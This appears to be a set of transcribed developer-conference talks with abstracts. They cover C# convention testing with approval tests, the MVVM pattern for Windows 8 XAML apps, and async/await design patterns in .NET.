And this is really powerful because what it gives you is it gives you a trail of those changes. As the project grows, if you find something you see that doesn't conform to the rule, you're not sure why. You can always look at that file in your blame tool. You can find the exact line that corresponds to that type and you can hopefully see a helpful message that will explain you. This is okay because of that, because this is a DTO from a legacy system. We need to integrate with it. We are not controlling how it works. Right? And this is really powerful and you can use that for many other things as well. You can use that not just for the things that you control but for things that are out of your control. You can use that to, let's go back to this example of WCF and behaviors. Here's a framework that we are using that applies behaviors to the WCF services but we do not see that. But why not use this tool? Why not use approval testing and then generate an approved file that all it does is it lists the behaviors that are applied to every single service that we've got. And then we can very easily open that file and look at it. If something changes, if a new behavior comes along or if a behavior for whatever reason does not get applied, this test will fail and your DTO will exactly show you in which lines it's failed, which behavior existed and doesn't exist anymore. This really is very powerful. If you will remember one thing from that talk, remember this. Use approval test to validate things, to raise the visibility of the things that you do not normally see. So for example, what we could do is if you are using Windsor as your container or any other container for that matter. I'm using Windsor because, well, I use Windsor. But you can do the same thing with every other container. So for example, the problem with containers is there are those components registered in them and they expose services and they have lifestyles. But you kind of have to know the place where they are and you need to know how your framework works exactly. Well why not put it all out there in an approval test and have an approval test with a proofed file that will list all the registered components in your container. So you can write a test that will generate you this. It will register everything in your container and then it will tell you, well, you have four components. You have audit service class which exposes I audit service as a service is transient. You have I mapper. I don't know what it's implemented by because so it's laid bound and it's a singleton. I have local file system and I have time service. They are both singletons. This is very empowering, very useful and it increases the confidence of people on your team. The fact that they can look at those things and they can know what gets registered. And I will not even tell you how many times I found this very useful where I was trying to diagnose something. And then I could look at the file and I immediately could see whether a type is registered or if it's that registered. I expected it to be a transient and it's a singleton. And you can take it even further. With many frameworks, you can inspect statically things that are wrong with it. So for example, with Windsor, you can statically inspect the components that Windsor thinks are misconfigured that they have dependencies that are missing. So this is the first file which says that the following components come up as potentially unresolvable and it's empty. So it's good. 
All of my components can be resolved according to Windsor. But if I then go and so let's find a component, let's take it to service. So I add a dependency here, one that's not being registered. Right? Say I principle, that's fine. Okay? So I now run this test. So imagine I'm a normal developer, I work with something. I expected that I principle will be registered. I think it's fine. So I just added, I keep working and I run my test and now a failure. I didn't expect it to happen. This helped me from committing not working code even without running that code. If this was a service that is called only once in a blue moon, if I didn't have that, think what would be the chances to finding that, right? And using this tool, using this approach, I've shortened the feedback cycle. I immediately, right after compiling and running my test, know there is a problem. And Windsor is even nice enough to tell me what the problem is. It tells me some dependencies of this component could not be static, let me make it wider, could not be statically resolved, right? It tells me which component. I have audit service which is waiting for the following dependencies for I principle. Well and I principle has not been registered. This really is very powerful. And you can use it not just for your IOC containers, you can use it for every single framework or for every single convention that you have in your system. Make the implicit things that happen in those frameworks explicit. So for example, if you use Fluent and Hibernate to generate your mappings, why not output them to a file, the XML that gets generated, and then make an approval test out of it, right? And then it will dramatically increase the confidence that your team has in those tools and it will make them much easier to work with. It will decrease the amount of problems that you are facing. And I'm speaking from experience, right? And we've got some time, so maybe I will quickly just show you how those Windsor component, Windsor test works. They are slightly different and that's why this framework has dependency on Windsor. So for this case, I have the base class is Windsor convention test which returns Windsor convention data. And then it takes a configured container. So I create the container, I register components using installers from my other assembly, not the test assembly, but the one that has the actual code. And then in this case, by definition, I don't need to say anything. It will just look at all the handlers. So all I really need to do is just nicely format the description for each of them. The other test, the one that lists the components that are misconfigured, this is using the diagnostics from Windsor. So it's a Windsor convention test of I potentially misconfigured components diagnostic. Windsor has a set of those for different things. For example, it will tell you when you have a per web request, when you have a single ton that depends on a per web request component, which generally is a really bad thing. It will tell you when you have service locator usage or things like that. So this again is very, very simple thing. All the logic is not really relevant hidden from you in the base class. So all you really care about is you then again create your convention data, you put the container in it so that it can inspect it, and then you say you just specify the fail description and for fail item description. So this is very simple to work with, very simple to read, and it tells you that this is only potential. 
So this is yes, this is an important thing to understand when working with Windsor that those are potentially misconfigured components. And this is again why we are using approval test for that, because it may be okay for certain of those things to exist. Windsor only statically can go that far. So it will tell you, well, I think that you will not be able to resolve this object because it's missing some dependencies. But if the dependencies are provided dynamically at runtime, it will work just fine. So you can then approve that and you can say, I know of that, I realize what the ramifications are but this is fine, that's correct. Let's proceed. Right? And a very important thing happened here. Okay. Let's first recap what I did. So no matter how, no matter if you take this approach or a different approach, I'm not trying to sell you that nugget that I just shown you, this is just what I've been using on different projects and it has proven useful to me, it might not necessarily be useful to you. But whatever you do, be consistent. Remember that this is supposed to be read by many people over and over during the lifetime of your project. So make it consistent, make it easy to read because this is your executable documentation. This is replacing. This is executable version of this SharePoint document that you've got. List the offenders. Don't just say that, well, there are audited actions that are missing DTOs. That's it. Just say which of them are missing DTOs. Explain what the problem is. Why is it bad that they are missing the DTOs? What's going to happen if they don't have one? Maybe tell people how to solve that or maybe you can just say, well, go talk to John. That can also be fine. Test negative cases. Don't assume that people will approach the problem from the same angle every single time. You may start by creating your audit detection first and then if you've got tested approaches it's only from the audit detection DTO and it will not fail. And then people will be left scratching their heads thinking, why is it not working? Use approval testing for exception to the rule. And again, this is a very powerful tool and the integration with your DIFTools, if you use powerful DIFTools, will really easily and nicely visually show you what has changed, where it has changed. This is a really powerful tool. And use approval testing to make what's implicit, explicit, remove the glass door and then people will not freak out when working with conventions in your system. And what it gives you is you no longer have just the basic validation of at the syntactic level of that C-sharp compiler is giving you. This will create application-specific compiler that will validate the rules that are specific to your application. And those are not the only benefits of conventions. Conventions also establish common ways of handling recurring classes of problems. So, for example, this is how we set up our client server configuration. They help you reduce complexity by having just one way of solving one particular set of problems. We do it this way and only this way. And then if you have tests, the test will tell you where you've deviated from the single way so that you can fix it, you can adjust it. And they facilitate discussion when you've deviated. You've got a test. You've got a new class that is, say, a new service or a new view model, for example, just not to stick to WCF for too long. So you've got a different view model that is different than all the other view models that you've got. 
Using conventions, this facilitates your discussion because you've got your convention and then your test fails telling you, well, there's something different about this view model. There's an exception in the test. Well, then you hopefully grab someone who has worked with them or maybe the senior person or some other developers. You gather together and you look at it and you discuss, why is it different? Is it OK that it's different? Well, maybe we just approve that exception using approval test and go on. Maybe the convention is no longer right. Maybe the convention does not, has only very narrow look at the world, but this is a valid case for this to happen. So you change your convention. Or maybe this is simply a bug and then you just change the view model and it conforms to the rule. But what is really important is that it makes us talk to other people. Otherwise, without those tests, we would just say, oh, come on, move on, right? So what I found by using conventions is that they make happier developers because we write less brain dead code. We have more fun code to write. We outsource all of the boring things to tools and to conventions. They do the work for us and we concentrate on the actual problems that our customers want us to solve. And with that, we deliver better projects sooner. And this is it. We've got three minutes left, so if there are any questions, I will take them now. And if not, well, then thank you very much. There's a question there. I'm sorry, I cannot hear you. Can you speak up? Yes, source code will be available on my GitHub page. OK, then thank you very much.
|
C# (or Java) developers looking to cut down amount of repetitive boilerplate code but wary to let go of safe harbour of compile time checking Approach of incorporating conventions to cut down on repetitive boilerplate code has been around for several years. How can we apply this approach in a staticaly typed language, like C#, to best leverage its strenghts while retaining benefits of the language and .NET plaftorm? This talk will push the boundaries of your knowledge about using conventions. You will learn how to properly apply the aproach to dramatically cut down on the code no-one wants to write, and how to build application specific "compiler" to validate your conventions. And have fun along the way.
|
10.5446/50980 (DOI)
|
So, I guess it's time, right? Can you guys hear? Himi, okay? Yeah? Okay, so don't listen to what he says. Listen to what I say, okay? Cool. So welcome to the courageous who woke up in the morning. We are going to talk about MVVM. And most especially, I think the purpose of this talk is really to tell you that there is no need to panic. I think that's really what I would like you to take back home. It's, you know, every time a new framework comes out, right? We hear all kinds of fearful comments about the end of the world approaching. And what I would like to show you is really that Windows 8 is different from what we did before Windows RT. But there are also so many similarities that every, basically, you know, when you start, you feel at home quite fast. And then you discover the differences and we have to work around those differences. And this is really what the talk is about. My name is Laurent Buignon. I work for Identity Mine. We are a user experience company. We work with different technologies. So I would say our favorite is XAML. We are, Identity Mine was born from XAML, I would say. And it makes us really happy to see XAML used on a large number of platforms. We currently develop for, you know, civil IWPF, obviously, but also more and more for consumer-oriented applications such on the Xbox, for example. We also do a lot of work with the Kinect. We work for Surface. We work for Windows Phone, etc. So it's really opening up and XAML is running on a large number of platforms. And the interesting thing is that those principles that we learned in WPF back then and then since then in civilized, etc. apply very well to all those worlds. For the small story, small anecdote is that those applications that are developed for Xbox, civilized is used there. So this is a version of civilized which is used on the Xbox. And the MBVM light actually is used in many of those applications. So again, same principle, supply, whatever the screen is, whatever the size of the devices, you can use that. Which is a nice feeling. It's quite convenient. So today I want to talk to you about MBVM and let's start with a small recap so that we are all on the same page. So when we talk about those separation patterns in UI, we of course have to start with MVC because that's the most famous, that's where it all started. MVC is very old. It was developed around 1984 back then with Smalltalk, who coded some Smalltalk in his life. Nobody else? Wow. That was an interesting language which was mostly developed I think for research purpose, but actually there are some applications which actually run in Smalltalk. And it was the first language where everything was an object and when asked what is an object, the usual answer was well, that's an object. So everything was an object, right? And this is really the very first fully object oriented language. So, you know, MVC is very famous. It's used everywhere. We have of course ASP.NET MVC. We have Ruby on Rails. It's also an MVC based framework. And the idea here is that you have the model, the model being wherever your data comes from. It can be a collection of web services. It can be a database, etc. You have a view, which is what the user is seeing and actuating and using, right? And then the controller is there to coordinate all that. So it's a little bit like the director for an orchestra. This is an object which is very powerful. So it goes a little bit into the concept of good object. It can do really a lot in your application. 
Some would argue maybe a little bit too much. And of course, this is an object that the application cannot live without. In XAML based frameworks, the concept of controller is probably not the best, mostly because of the data binding system. So when we have data binding, it makes sense to move to something else, which is the MVDM pattern. So here we again have the model. We again have the view. The main difference is that the controller is not a big controller for the application, but we have one small controller per view. Of course, your mileage may vary. So sometimes we have one view model for multiple views. Sometimes we have views without view models. It depends. But basically the idea being that you have this pair view, view model. At the view model to model level, no big changes, same principle supply as before. So you have events, you have methods, calls and all that. The big difference is really between the view and the view model, where we use data binding. Data binding, so the data binding system is very powerful. It also allows you to create those binding in a declarative manner, meaning that you don't write code for that. You write some markup. And there is a big advantage to writing markup, first of all, because by nature the data binding system is loosely coupled, which means that you can write at design time in your application a data template, which is not placed in the context of any data context at all, and you can write your bindings. And then those bindings are going to be applied when the application runs. That loose coupling has disadvantages too, right? It means that it is difficult to debug data binding, because the data binding will never throw an exception when the data source is null, because this is loosely coupled. That's the nature of that. The power of it is really this loose coupling, the fact that you can, in a very separate timeline, you can define your data object, and then later, another role, maybe even another person, can define how the UI is going to react to those data. And also, data bindings are great for the tools. So we'll see examples with blend later, because markup is great for the tools. Of course, data bindings work well there too. Now, sometimes the view needs to communicate to the view model in a more elaborate way, in a more advanced way, than just with data bindings. And for that, we like to use commands. Commands are a way to expose a method, to expose a functionality as a property, and then we can use data binding to bind, for example, a button or a UI element to those commands. And then in the other direction, sometimes, again, the view model needs to communicate with the view in a more elaborate way than with data bindings. For example, if you need to start and coordinate animations in a precise way, then you probably need to do something in the view. And in that case, I'm going to show you how to use something called view services to do that. Another way would be to use a messenger of some type, a type of event bus. And you have different ways to do that. So we'll talk about that. When you do that, when you go from the view model to the view, one component which is nice to use is the behavior. Okay, behaviors are very powerful. They are a way to encapsulate a piece of view code, and then to reuse it later in your application. It's very convenient. It's very tool-able as well. So it's very bindable. The nice way, very blendable, I mean, sorry, the nice thing is that you communicate with your behaviors with data binding. 
So again, you have this advantage of this loose coupling between your view model and your view. Imagine that you have a property on the view model which is true or false or maybe an enumeration. And then in your view, you want to control animations based on that. Well, you can do that with the behavior, and the view model doesn't have to worry about what's going to happen in the view. Okay, so it's very nice. It's also very blendable. Behaviors are very easy to drag and drop and configure in expression blend. Which is, of course, an advantage because it means that a non-technical person, such as a designer, for example, can do the work. Now, behaviors have a big disadvantage. It's that they don't exist on Windows 8. So in Windows 8, we need to find workarounds. Let me say yet at this point. They don't exist yet. I think that everybody agrees that they are very, very useful. And who knows? I think at some point in the future, we might see them, but I don't have information on when that may happen. Right now, we have to use workarounds.
|
The Model-View-ViewModel pattern is a common denominator between applications using XAML to create the user interface. First applied in WPF, it was then easily ported to Silverlight and Windows Phone development. With WinRT and the Metro-style applications, XAML is now a first-class citizen for native Windows 8 development. Here too, the MVVM pattern is making developers' life easier, and proven components can be used to simplify and speed up application development. In this session, Laurent Bugnion, the creator of the acclaimed MVVM Light Toolkit, will present best practices around XAML-based Windows 8 application development, and how to leverage code and skills in Windows 8 too.
|
10.5446/50982 (DOI)
|
And I commend you for sitting through two of these, by the way. I've been looking forward to give this talk for ages. I've been really wanting to give the advanced async talk. But whenever I've done it in the past, whenever I've gone to conferences, people have told me, oh, we've only got one slot for you. So I've always been stuck to the basic things. This is my first time. It actually... What I wanted to share with you was the async design patterns that we, inside Microsoft, have developed from the past two years experience of using async. Best patterns, best practices, recommended patterns, exciting patterns. The first third of the talk will be very heavily code focused on those design patterns based on what we've learned. Middle chunk of the talk will be about the real world. It will be about you've got a legacy application and there are lots of comments throughout it saying, warning, do not alter this code. It's probably synchronous up there. And now you're adding a new bit here and you're using a new library and you want it to be async and you're wondering, well, how do I tie into the stuff? Or just how do I integrate async into my existing world? Maybe synchronous or maybe event-based. Final third of the talk is slides only and it will be about the details of the code generation. It will be about as much of the code generation as I thought was important for you to understand some principles behind it, particularly around performance and how to think about that. And in the third talk, I'll be going on to the ASP side of things. The rest of it's universal. Just before I started, I quite wanted to... I wanted to share this way of looking at it. Looking at await versus callback, event-based programming style. On the left is how we'd write it using await things. On the right is how we'd write it using callbacks. I suppose... What to notice about it is that this semicolon operator, probably you don't even think about it as an operator, but it is an operator in the language. It's the operator for sequential composition. It doesn't exist in the callback world. So callbacks do not even work with the tiniest operator in the language. How about if statements? If B, then await statement 1a, await statement 1b, and then await statement 2. We tried to write this using callbacks. It would be if B, do statement 1a, followed by a callback to statement 2, otherwise 1b, with a callback to statement 2. Basically, we've had to duplicate statement 2. So callback style does not compose with if blocks. How about a while loop? I'm sorry, that's a hideous pink. It looks clearly better on my screen. Anyway, for each with an await inside it, that's fairly nice, how on earth would you write a for each loop using callbacks? Answer, you can't do a for each. I'm not actually even sure that this code is correct. The reason is that it's a using clause here, but we should end the using after all of our statement 1s have been completed, rather than just the first one has been completed, and I don't think it's got it right. Oh, well, I mean the message is very clear, that we're in the world, we've left the world of callback programming because it's a bad, bad world to be in. Anyway, design patterns. This slide just summarizes all of them. Once again, all of this talk and all of the code in it will be on my website in a week or so, so you don't need to write anything. I'm just going to go straight to code, and let's see where we go with that. I'll return to the slide and we'll see what we've done. 
I started with a WPF application this time. Once again, pretty simple, and I'm sorry for doing such simplistic examples all the time. I really wanted to have complete working code. This one is calling await loadpics, and loadpics follows the task async pattern. It's got the async modifier, it returns a task. Actually, I should have called it async, shouldn't I? That's part of the pattern. What it's doing is getting the path to the My Pictures folder. It's going to accumulate all of the results. It's enumerating all of the files, the JPEGs in that folder, and then it's loading them, calling a helper function that I wrote, load bitmap async, add it into my results, and it's updating the UI just as feedback so I can see that it's running. Then I stuck this await task.delay just so that user interface didn't get overwhelmed and bogged down in this work. If I run it, pretty straightforward, I hit the loadpics button, and it goes through a bunch of holiday snapshots. Okay, let's do something with it. We already talked about cancellation. That's pretty easy. Let's just add that. CTS equals new cancellation token source, and button two dot click plus equals... Once again, on the inner loop, it will throw the exception if it's been requested. Once again, I should run this in a try block to protect against cancellation. What I've done here, just to keep the code small and local, is I signed up the cancel handler right inside my code. What's ugly is that here, there isn't a good separation of concerns. The function that does loadpics async is also updating the UI. I would love for this just to be the function that loads the pictures, and somewhere else in my code updates the UI accordingly. It could have been with the data bound list. That would be a natural WPF way to do it, but I'm going to show you another way, which is more general and works arbitrarily in the task asynchronous pattern. Let's start by writing a delegate, which will listen for progress. I've created this progress object using the new progress type, and I put a delegate inside it. My idea is that whenever the method wants to report that it's made some progress, then I will hook up my progress handler to it. Let's pass it to it. It's a standard part of the task asynchronous pattern that if you wish to support cancellation, you stick it as the last parameter. If you want to support progress, stick it as the second last parameter, or use optional parameters if you want. I'm going to use the same parameter that I've created for the previous task. I'm going to use the same parameter that I've created for the previous task. I'm going to use the same parameter or use optional parameters if you want. Instead of modifying the UI directly inside my logic, I'm going to say if progress.null.report.bmp. That's the best way to do progress. Now, if I run it, I hit load pics, and it's updating the UI from the correct place in my code. It's updating it from the button handler rather than the logic. There's something interesting about this way of doing it, using the progress concrete type and the eye progress interface, is that this progress type will automatically marshal things from wherever it was into the appropriate synchronization context. That's not important in this case because we're running this method load pics async on the UI thread. But if we're running it on the background thread, or if it was anything like that, the reported progress, it would automatically get progress back in the correct place. 
The next thing I want to talk about, okay, so that's number one item, progress is part of the task asynchronous pattern. Next thing I want to talk about, this await task.delayof1000, I said for UI responsiveness. Why is that? Well, let's try seeing what happens if it's not there. I do load pics. My application is just frozen solid. Why is that? It's frozen solid, even though I've got a weight in here. Finally, it did something. It froze solid because my work was actually chiefly CPU bound. The bitmap loader I had saw that it was trying to load a file from disk, and so it chose to do it synchronously because it knew it could do it quickly rather than asynchronously, and so it finished immediately. And because this loop was just running so tight, the user interface thread almost never got a chance to do anything with itself, never got a chance to update. This is the old familiar problem. You might be thinking, damn it, has a weight not helped me at all? Well, it looks like it hasn't. So what are we going to do about this? The load delay of one second was a bit of a goofy way to get around it because it slowed everything down. What we'd really like to do is run as quickly as possible without interfering with UI responsiveness. So let's put a weight task.yield and run it. Oops. It hasn't helped at all. I led you down the wrong path. This is, I thought, a bad API. We thought it was a good idea when we were creating it, but suddenly the release candidate for Visual Studio closed down, and we realized it's a bad API. It doesn't fulfill the communist need people have of it. We couldn't remove it because we just can't remove things at this late stage in the game, but we did the next best thing, which is add a more useful... Okay, I'm sorry. Ah, because you're down there, you can only see. Okay, gotcha. We did the next best thing. Wait, dispatch.yield. Actually, I can tell you why it doesn't work, and it should have been obvious to us just at the first point. When we say, I wish to yield control to the UI thread, intrinsic in that is a notion that we wish to yield to things more important than us. And task.yield doesn't have a parameter to say what things are more important than us. Therefore, it's technically impossible for it to do what we want it to do. And indeed, there's no cross framework notion of levels of importance. I mean, there's something in WPF, and I'm going to use that, but I'm going to use the yield of dispatcher priority.idle. What that says is that... Why doesn't that work? Don't application idle. What that says is that everything that's more important, including the UI, including redrawing it, should happen before I get back from this yield statement. I wish to yield at the priority level of application idle. And if I run it this time, then it updates more quickly and it's showing all of the things correctly, and it lets me drag better. Let's close that. I just wanted to do something on cancel.image1.source equals null. What I've shown you here is the WPF way that you can yield control in a busy loop to let the UI regain some chance. Question. What are the other ways, good ways to do it? What is a good way to yield in WinForms or Metro in Win8? For that, please read Stephen Talb's blog. He's been writing posts on this topic, and he has the better answers. There's still something pretty ugly about this code, you know. What's ugly about it is that dispatcher.yield is totally part of my UI layer. It's not part of the logic layer, and yet it's inside my logic function. 
So the question is, how can we promote this to outside it? I'm going to show you a beautiful pattern that we've been using from time to time. Let's delete all of this. Delete all of this. And start from scratch. Interface, iAsyncEnumerator of t. Task of bool, move next, async. And tCurrentGet. If you've looked at the regular.net iEnumerator interface, this is almost the same, except the regular enumerator just has a bool returning synchronous move next method. I wanted to generalize it to an asynchronous move next method. And of course that makes sense. I mean, imagine you're enumerating through rows in a database. You're probably going to cache them. You've got 100 rows at a time. Each time you call move next, it might return immediately if it's already in the cache, but if it has to fetch the next batch of 100 rows, then it might take a long time. So what's the move next method that will take time before it can give you the answer of whether there is or there is not more data? Well, how are we going to use that? We're going to create a method. In fact, let's put it down here. iAsyncEnumerator of bitmapImageEnumerator equals loadPixAsync2. And then I'll implement it. Actually, I won't do it yet. I've got the enumerator while await end.moveNextAsync. Image1.source equals end.current awaitDispatcher.yield of dispatcher. OK, that's pretty good. What we've got here is a pattern where all of the UI layer happens in the UI, where the UI can control the rate at which it asks for more data. If the UI isn't ready for more data, it won't ask for more data. And the function loadPixAsync2 can also control the rate at which it sends data. If it has nothing available, then it won't give anything. I think this is a beautiful pattern. Do you know what it looks like? It looks like a stream. A stream is something where it's got a fixed buffer, maybe 1k or so, and the producer can put stuff into the stream, but he might block if it's full, and the consumer might take things out of it, but he might block if it's empty. So we've basically implemented what is conceptually a stream. Well, except we haven't implemented it. The other one is not implemented, exception. ViewToolBox. Here's one I implemented earlier. This is the time when I wish I had a code monkey to help me with it. Okay. I knew that I wished to return some object that implements the IAsync enumerator interface, and I just had to throw it together, and it's not conceptually difficult what we'll do, so I'm not going to spend too more time on it than is justified. All that my function loadPixAsync does is it constructs an instance of this object, loadPixEnumerator, that I created for this purpose, and I pass it the relevant information, a cancellation token, and the enumerator over the list of files in the directory, and then as for the implementation of the loadPixEnumerator, it has this method moveNextAsync, which says if cancellation has been requested, I'm just going to return false. I'm not going to continue doing anything. If also there are no more files in the directory, then I'm going to return false. Otherwise, I'm going to load the current file name as a bitmap into this current thing and return true, indicating that there is data, so that when someone comes to fetch the current property, they'll find what they were after. Some of you might have seen IAsyncEnumerator already. That's because it was shipped as part of the Rx framework, the reactive extensions, and they use it extensively, and this is exactly the same thing. 
Wouldn't it be beautiful though if instead of doing... where are we? Inside the button click handler, we do this while await. Wouldn't it be beautiful if we could do forEach await, far, pick, in, loadPixAsyncTo? It would be great if we had some async version of the forEach loop, which called the moveNextAsync rather than a regular one. Unfortunately, we don't have it. Why don't we have it? Partly, it was quite difficult to implement, and it would take us extra time. But more generally, it would have made this pattern a bit too easy. I'm quite serious about this, because what we're writing here is a whole bunch of code that is creating an entire object. It's got a load of state. It has moveNextAsync. It's a very chatty interface. Imagine if we did use this for database rows, and imagine if we got batches of 1,000 at a time, and imagine if you invoke this async moveNext function for every one of those thousand rows. Most of the time, the async function would return immediately, and you'd be incurring the overhead cost of an async method without much benefit. You might be misled into using this pattern too frequently and having a chatty interface that winds up being inefficient. What we've ended up with is it's not too difficult to use, and it's very clear what you're doing, and you're clear that you're using it frequently, and you're clear about the chattiness, and that's just the roadblock, the speed bump, to make you stop and think. That said, I was on the side that wanted it to get into the language. LAUGHTER Let's try something else. I've talked to the last talk about void returning asyncs, and one of the loudest complaints we've had is, why do you have void returning asyncs? Because they're dangerous, basically. All of the code that you write, apart from the top-level event handlers, should be returning task or task of T. It should not be returning void. But then people ask, well, I wish to launch something in a Fire and Forget manner. In fact, let's do some of it. Let's... Up here. Let's wait for some computational work to happen, and I'll get it out of the toolbox. No, I won't. I'll generate it from source. OK. And I'll get it out of the toolbox. I've got a really stupid Fire and Forget task that I want to run here. All it does is change the label content, then it invokes a helper function to download a bunch of data, then it uses task.run with a computeFastForearTransform function that runs it on the thread pool, so it's not to interfere with UI responsiveness, and then it updates the UI and says, hey, I've finished with FastForearTransform, and I run it. It shows the... Once it's finished, it says finishedFFT, and it gets on with the regular work. But I think to myself, wait, that doesn't make sense. I would like it to do the work in the background. I don't want to wait for it right here and now. I just want to leave it running. One way I might do that is delete the await word. Well, that will certainly start it running, and it won't wait for it to finish. A warning pops up. It says, warning. I'm sorry, I didn't increase the font size. It says, warning. Because this call is not awaited, execution of the current method continues before the call is completed. Consider applying the await operator to your call. You think to yourself, well, I didn't want to apply the await operator. I just wanted to let it run in the background. Let's do it properly. Let's say task t equals do work async, and then at the end of the method, I can await t. It's a really good pattern. 
When if you launch something async, just await for it at the right time, maybe later, maybe like I was using this outstanding list of tasks, but wait for it somewhere. How about if I really thought I was being smart, and I didn't want to do that, and I didn't do this, the warning message just says, warning, it returns a task, but you're not awaiting it. So I thought, huh, I can make this a void returning async. Ha, ha, ha, ha. Question. What will happen in this case if an exception is thrown somewhere? Where does the exception get thrown from a void returning async method? It can't be thrown back to the caller, because the caller has already executed this statement. It's probably executed the rest. It might well have left the entire message. The answer is, if you have a void returning async method with an unhandled exception, then the exception would be propagated to the calling synchronization context. It will pop up to the UI thread in this case. That's really bad programming. You know, it's bad to have exceptions being unhandled, throwing up to the top. The only way I can imagine this being legitimate... Let me say that again. The only time I think it is legitimate to have a void returning async is either if you're at the top level event handler, or it's normal for top-level event handlers if they have unhandled exceptions to throw them up to the UI, or if your void returning method never catches any exceptions. But then you think, wait a minute, it's just written a catch-all exception. That's bad practice. Yes, it is bad practice. So you shouldn't really be doing it. You should always be awaiting, either directly or indirectly, all asynchronous things you do because of this danger of exceptions. Or if you really want to do it... Let's try another way around it. Have it return task. Having it always return task is a good thing, because it means that if one user wants to launch it in a Fire and Forget method, they can. But if another user wants to wait till it's finished, then they can. So returning task gives the maximum flexibility. The recommendation is far dummy equals. I saved it into a dummy variable just to get the compiler to shut up with its warning. That's not good practice. The person reading my code says, why do you do this? So, note, I used dummy because I... guarantee that do work async throws no exceptions, and I want to launch it Fire and Forget. Our recommendation is, if you're using this trick of assigning to a dummy to silence the warning, always put an explanation somewhere in your code. Or if you want to just do it more generally, you could make an extension method, let's say, Fire and Forget. Something like that. Some clear indication to the user that you know what you're doing, and that this is safe, and be aware of adding any exceptions to the method. That's our recommendation on that part. Let me give you another recommendation. Look at this routine. Await task.run of delegate of library.compute.fft. At this point, the guy who wrote the compute.fft library function is thinking, what a pain. My consumers are probably all going to be using task.run. So why don't I offer them a task.run async version of my compute bound work? Let's see what that would look like. I've already got the compute.fft. function. If you look carefully, you might notice that it doesn't compute the fft. But let's just pretend for argument's sake. Return task.run of... Task.run of... Okay, what this library author has done, this has offered an async version of his API. 
It is merely a wrapper that creates a thread around the synchronous version of his API. Seems reasonable enough. And the user can change their code to no longer do this. They can just do await.library.compute.fft.async. This is bad practice. Why is it bad practice? Because we should be in the business of telling clients of our library the truth. If something is compute bound, then we should give them a compute bound function. It's up to the user of our library to decide how many threads he wants to allocate. If he's on ASP, he won't want to allocate any threads because that would be a complete stupid thing to do. If he's a top level event handler, then yeah, he will choose to create threads. Creating threads is such a heavyweight operation that it should never be done implicitly. So the guidance there is, never create this kind of wrapper around your APIs. Let's see what I've covered so far. I talked about the task asynchronous pattern, which we've already seen. I talked about the iProgress type and how we use new progress of T, and it always comes back on the user thread. I talked about task.yield, which doesn't. I talked about the iAsync enumerable pattern, which is a beautiful pattern where it's appropriate, where it's not appropriate if most of the time it will be ready immediately. It is appropriate in other places. I said, don't wrap synchronous APIs as async. And don't wrap them the other way around, actually. If you have an asynchronous API, don't offer up a synchronous version that merely calls the asynchronous version. That's not doing users any service. The user, by looking through IntelliSense, should have a good feeling of which of your methods are safe to call and which are not. And I talked about fire and forget APIs and how dangerous they are, but how they're the only use of void asyncs in certain cases. Let's move on. Integrating async into existing code. I need to go back to the code, actually. Let's start from a fresh slate. What should we do? In this case, I imagined that I have an existing application. In this existing application, I'm sorry, again, it's a toy example. It upstates the label. It invokes one subroutine synchronously and then invokes another routine synchronously. And the chief architect said, warning, do not change this. Or maybe it just said, it must be synchronous, because the top level, maybe I'm not in control of it. Maybe I'm only in control of a small corner of the routine. And here, I've been asked to implement this subroutine one, which has to return by the time it's finished. It is not an async method. How am I going to do it? Well, let's have a concrete example to work with. Let's suppose I wanted to helpers.downloadDataAsync again. It says await. Oh, I need the async modifier, and I need it to return task of int. And I should call it the async version. But then the caller has to change into await. And then the caller needs to put async. But I was told, warning, I should not change this. I have to figure out a different way to put a wait corner into my existing piece of code. Let's factor it out. Task t. What if we did t.wait, and then return t.result? What's that complaining about? Ah, int array. Is this going to work? Heck no. We know from the message pump diagram that we've mixed synchronous and asynchronous in the same program, and it's going to lead to the deadlock. We can't do it that way. We'll have to do it a different way. Oops. Well, here's one I did earlier again. You know how when you do message box.show? 
We can't do it that way. We'll have to do it a different way. Oops. Well, here's one I did earlier again. You know how when you do MessageBox.Show? Then this is kind of a synchronous routine, in that execution doesn't return until after it's finished, but it still manages to pump messages just fine with a nested message pump. That is the only way, basically, that we can integrate our corner of async into an existing synchronous application. And I wrote one that does that: t.Wait with a nested message loop. If I run this... loaded. So it's working okay. I didn't show you that it was responsive in that time, but it is. I used a nested message loop here. Hopefully all of you at this stage think, oh my god, no, nested message loops are terrible. That's true. They're terrible. But they're the only thing we can do in this case. Let's look at how I implemented it. Actually, that's not how I implemented it. That's how I went to Stephen Toub's blog, copied down what he had written and put it into my code. He's written a lot more about this. WaitWithNestedMessageLoop: the sole reason for this routine is to block until a task is finished. If I were doing WinForms, it would be easy. I could just do this loop while the task is not yet completed: Application.DoEvents. Kind of a busy loop, actually. WPF is, of course, better architected and, of course, much more complicated to understand. But this code does exactly the same thing. It creates a nested message loop to accomplish exactly what we wanted. That's the one side of putting an asynchronous corner into a synchronous existing body of code.
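The WPF flavor of that helper boils down to something along these lines -- a sketch of the idea, not Stephen Toub's exact code, and it has to be called from the UI thread:

    using System.Threading.Tasks;
    using System.Windows.Threading;

    static class SyncOverAsyncHelper
    {
        // Block until the task finishes, but keep pumping WPF messages so the UI
        // stays alive and the task's posted continuations can actually run.
        public static void WaitWithNestedMessageLoop(Task task)
        {
            var frame = new DispatcherFrame();
            // When the task completes, end the nested loop (scheduled back onto the UI context).
            task.ContinueWith(_ => frame.Continue = false,
                              TaskScheduler.FromCurrentSynchronizationContext());
            Dispatcher.PushFrame(frame);   // nested message loop until the task completes
            task.Wait();                   // observe the result / rethrow any exceptions
        }
    }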
What about the reverse, putting a synchronous piece of code into an asynchronous harness? You know that we don't want to run the synchronous -- in other words, the blocking -- code on the UI thread. So we're going to use Task.Run to run it on a background thread, exactly as we saw already with this ComputeFft routine. How about... How about if we're up here and we're down here? Okay, I'm going to write something different. Button1.Content equals "ready". I need to have, you know, like in Top Gun: he wants to launch the missiles, but he can't just press the button. He has to flip the cap first, and then the button is exposed. I need to do the same kind of thing here, using await in a surprising way for the control flow. The button normally says ready, but when you hit the button, it's going to uncover it and say fire. The question I'm asking is how I can integrate existing legacy functionality, like the button click handler, with new functionality like async. Here's my idea. In other words, how can I turn an event-based thing into a task-based thing? Let's write the code for it. So what this guy did was await ButtonClick of button1. In other words, ButtonClick had to return a task, or at least something awaitable. The first thing it does is var tcs equals new TaskCompletionSource. What is a task? Remember, I said in the olden days people used to think a task meant a background work item that ran on the thread pool. That's not true. A task is merely a promise. In other words, a task is an object which exists in one of three states: I haven't yet completed, or I have completed successfully, or I have completed with an error. Various events can cause it to transition from the first state to one of the other two 